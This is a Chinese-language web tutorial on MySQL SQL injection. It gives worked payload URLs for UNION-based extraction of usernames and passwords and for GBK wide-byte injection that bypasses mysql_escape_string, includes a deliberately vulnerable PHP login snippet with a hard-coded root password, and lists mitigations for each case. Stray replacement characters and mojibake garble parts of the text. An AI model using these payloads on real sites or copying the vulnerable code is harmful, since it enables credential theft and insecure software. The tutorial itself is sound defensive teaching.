一�����、單字節(jié)SQL注入
MYSQL的SQL注入已經由來已久���,以下是普遍采用的注入步驟:
1、在GET參數上加一個/*或者#(mysql專有的注釋)����,判斷數據庫是否是mysql,比如:
http://www.xxx.com.cn/article.php?id=1607 and 1=1/*
2���、猜解某表的字段數�����,從order by 1一直更改到頁面出錯為止�,就可以得到該表的字段數
注入URL:http://www.xxx.com.cn/article.php?id=1607 or 1=1 order by 10#
對應的SQL: select * from articles where id=1607 or 1=1 order by 10#….
3、使用該表和用戶表進行關聯查詢�,在文章列表里就可以看到用戶名和密碼了。當也要猜解用戶表的表名和用戶名�、密碼的字段名,比如上一步得到的字段數是5:
注入的URL:http://www.xxx.com.cn/article.php?id=1607 or 1=1 union select? username,password,1,2,3 from user
對應的SQL: select * from articles where id=1607 or 1=1? union select? username,password,1,2,3 from user
這樣就可以在界面上看到用戶名和密碼了��。
解決方法:
過濾數據:這并不是羅唆����。在合適的地方使用良好的數據過濾,可以減小多數安全隱患�����,甚至可以消除其中的一部分�����。
將數據用括號包含:如果你的數據庫允許(MySQL 允許)�,在 SQL 語句中,不論什么類型的數據都用單引號包含起來�。
轉義數據:一些合法的數據可能在無意中破壞 SQL 語句本身的格式。使用 mysql_escape_string() 或者所使用數據庫提供的轉移函數��。如果沒有提供這樣的函數��,addslashes() 也是不錯的最后選擇。
二���、寬字節(jié)注入
寬字節(jié)注入也是在最近的項目中發(fā)現的問題��,大家都知道%df’ 被PHP轉義(開啟GPC����、用addslashes函數�,或者icov等),單引號被加上反斜杠\�����,變成了 %df\’����,其中\(zhòng)的十六進制是 %5C �,那么現在 %df\’ = %df%5c%27,如果程序的默認字符集是GBK等寬字節(jié)字符集����,則MYSQL用GBK的編碼時,會認為 %df%5c 是一個寬字符���,也就是縗’���,也就是說:%df\’ = %df%5c%27=縗’�,有了單引號就好注入了���。比如:
以下為引用的內容: $conn = mysql_connect("localhost","root","2sdfxedd");
mysql_query("SET NAMES ‘GBK’");
mysql_select_db("test",$conn);
$user = mysql_escape_string($_GET['user']);
$pass = mysql_escape_string($_GET['pass']);
$sql = "select * from cms_user where username = ‘$user’ and password=’$pass’";
$result = mysql_query($sql,$conn);
while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
$rows[] = $row;
}
?> |
則通過以下注入即可:
http://www.xxx.com/login.php?user=%df’%20or%201=1%20limit%201,1%23&pass=
對應的SQL是:
select * from cms_user where username = ‘運’ or 1=1 limit 1,1#’ and password="
解決方法:就是在初始化連接和字符集之后��,使用SET character_set_client=binary來設定客戶端的字符集是二進制的���。如:
以下為引用的內容: mysql_query("SET character_set_client=binary"); |
關鍵詞標簽:MySQL,SQL
10款MySQL數據庫客戶端圖形界面管理工具推薦
MySQL常用維護管理工具